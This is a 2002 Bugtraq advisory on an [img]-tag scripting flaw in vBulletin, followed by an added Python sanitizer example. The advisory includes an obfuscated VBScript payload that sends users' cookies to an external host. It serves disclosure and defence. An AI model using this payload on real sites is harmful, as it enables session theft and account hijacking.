[img]-vulnerability in vBulletin Version 2.2.2 & 2.2.1 & maybe olders

From: Cano2 (Cano2@buhaboard.de)
Date: 03/20/02


Date: Wed, 20 Mar 2002 19:29:30 +0100
From: Cano2 <Cano2@buhaboard.de>
To: bugtraq@securityfocus.com

Hi

I've discovered a vulnerability in vBulletin's [img]-Tag
implementation that allows users to inject VBS code in posts and
private messages ([img] is switched on by default).
Through that, an attacker is able to steal other users' cookies and
maybe hijack their accounts.

The following code sends the user's cookie to a PHP script
(http://www.ignite.barrysworld.net/test.php?c= in this case, which
just prints it back to the browser).
It is enclosed in a [code] tag, the URL is encoded as ASCII character
codes, and line breaks are inserted to avoid filtering of some
characters and insertion of <br> tags.

[code][img]vbscript:location.replace(
chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+
chr(47)+chr(47)+chr(119)+chr(119)+chr(119)+
chr(46)+chr(105)+chr(103)+chr(110)+chr(105)+
chr(116)+chr(101)+chr(46)+chr(98)+chr(97)+
chr(114)+chr(114)+chr(121)+chr(115)+chr(119)+
chr(111)+chr(114)+chr(108)+chr(100)+chr(46)+
chr(110)+chr(101)+chr(116)+chr(47)+chr(116)+
chr(101)+chr(115)+chr(116)+chr(46)+chr(112)+
chr(104)+chr(112)+chr(63)+chr(99)+chr(61)+
escape(document.cookie)
)[/img][/code]
  

History:
 Feb 19 02: contacted Jelsoft
 Feb 20 02: Vendor confirmed the bug
 Feb 21 02: Jelsoft claimed to have made a patch "which clamps
            down on what characters are allowed in an [img] tag,
            as well as requiring it to start with http://".
            Sounds good ;)

 vBulletin 2.2.3 & 2.2.4 have been out for some weeks, but there are
 still sites using vulnerable versions, so better update!
 

lates, Cano2 mailto:Cano2@buhaboard.de

--
Truly rich are those who have more dreams than reality can destroy

BuHa-Security Board www.buhaboard.de
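The vendor's reply above describes the fix only in words: restrict the characters allowed inside an [img] tag and require the value to start with http://. The following is an added example of what such a check looks like, written in Python for illustration (vBulletin itself is PHP, and this is not Jelsoft's patch or vBulletin code). The allowlist regex, the function names and the sample posts are assumptions made here; the second sample post reproduces only the shape of the PoC from the mail (a vbscript: URL built from chr() calls, split across lines) and is constructed for the test.

```python
import html
import re
from typing import Optional
from urllib.parse import urlsplit

# Matches [img]...[/img] pairs; DOTALL so that line breaks inside the tag
# (the trick used in the PoC) are still captured and run through the check.
IMG_TAG_RE = re.compile(r"\[img\](.*?)\[/img\]", re.IGNORECASE | re.DOTALL)

# Assumed allowlist: scheme must be http(s)://, and only the characters that
# appear in ordinary image URLs are permitted. Anything else (colons for
# other schemes, parentheses, '+', quotes, whitespace, newlines) is rejected.
SAFE_URL_RE = re.compile(r"https?://[A-Za-z0-9._~\-/%?=&#]+", re.IGNORECASE)


def safe_img_url(raw: str) -> Optional[str]:
    """Return the URL if it passes the allowlist, otherwise None."""
    url = raw.strip()
    # fullmatch: the whole value must satisfy the pattern, so an embedded
    # newline or a 'vbscript:' prefix fails no matter how it is encoded.
    if SAFE_URL_RE.fullmatch(url) is None:
        return None
    parts = urlsplit(url)
    # Belt and braces: re-check the parsed scheme and require a host part.
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return url


def render_img_tags(post: str) -> str:
    """Replace each [img] tag with an <img> element, or drop it if unsafe."""
    def repl(match: "re.Match[str]") -> str:
        url = safe_img_url(match.group(1))
        if url is None:
            return "[img removed: disallowed source]"
        # Escape before emitting so a passing URL cannot break out of src="".
        return '<img src="%s">' % html.escape(url, quote=True)

    return IMG_TAG_RE.sub(repl, post)


# Constructed sample posts (not taken from any real board).
LEGIT_POST = "look at this: [img]http://example.com/pic.png[/img]"
POC_SHAPED_POST = (
    "[img]vbscript:location.replace(\n"
    "chr(104)+chr(116)+chr(116)+chr(112)\n"
    ")[/img]"
)

if __name__ == "__main__":
    print(render_img_tags(LEGIT_POST))
    print(render_img_tags(POC_SHAPED_POST))
```

Note that this covers only the [img] value itself. The mail also points out that the payload was wrapped in a [code] tag to dodge other filtering, so a real parser must additionally make sure that tags appearing inside [code] blocks are rendered as literal text and never reach the [img] handler at all.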
